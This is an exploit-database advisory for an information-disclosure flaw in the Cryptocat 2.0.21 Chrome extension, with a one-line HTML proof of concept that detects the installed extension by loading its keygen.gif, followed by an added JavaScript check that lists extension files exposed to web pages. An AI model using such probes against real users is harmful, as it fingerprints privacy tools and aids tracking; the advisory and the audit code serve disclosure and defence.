Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure Vulnerability

2012-11-07T00:00:00
ID EDB-ID:38636
Type exploitdb
Reporter Mario Heiderich
Modified 2012-11-07T00:00:00

Description

Cryptocat Chrome Extension 'img/keygen.gif' File Information Disclosure Vulnerability. CVE-2013-2261. Remote exploits for multiple platforms

source: http://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected. 

<img src="chrome-extension://[extension-id-from-chrome-web-store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >
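
The tag above reveals whether the extension is installed, because a file packaged in it either loads or fails to load from an ordinary web page. The following check is an added example, not part of the original advisory or of Cryptocat's code: it lists which packaged files a manifest leaves loadable by web pages. The function names, the manifest and the file list are constructed for illustration.

```javascript
// Added example: list the extension files that a web page can load and so use as an install probe.
// Convert a manifest glob such as "img/*.gif" into an anchored RegExp.
function globToRegExp(glob) {
  const escaped = glob.replace(/^\//, "").replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + escaped.replace(/\*/g, ".*") + "$");
}

// Collect web_accessible_resources entries as {pattern, matches}.
// Manifest V2 uses an array of strings, Manifest V3 an array of objects.
function exposedPatterns(manifest) {
  const out = [];
  for (const entry of manifest.web_accessible_resources || []) {
    if (typeof entry === "string") {
      out.push({ pattern: entry, matches: ["<all_urls>"] }); // V2: any page
    } else if (entry && Array.isArray(entry.resources)) {
      for (const r of entry.resources) {
        out.push({ pattern: r, matches: entry.matches || [] });
      }
    }
  }
  return out;
}

// Return the packaged files reachable as chrome-extension://<id>/<path> from web content.
function probeableFiles(manifest, files) {
  // Manifest version 1 (the default when absent) had no allow-list at all.
  if ((manifest.manifest_version || 1) < 2) return files.slice();
  const rules = exposedPatterns(manifest)
    .filter((r) => r.matches.length > 0) // V3 entries limited to extension_ids expose nothing to pages
    .map((r) => globToRegExp(r.pattern));
  return files.filter((f) => rules.some((re) => re.test(f)));
}

// Constructed sample data, not Cryptocat's real manifest or file list.
const sampleManifest = {
  manifest_version: 2,
  web_accessible_resources: ["img/*.gif", "css/page.css"],
};
const sampleFiles = ["img/keygen.gif", "img/logo.png", "js/main.js", "css/page.css"];
console.log(probeableFiles(sampleManifest, sampleFiles));
```

An empty result means no packaged file can serve as a load-or-error probe of this kind.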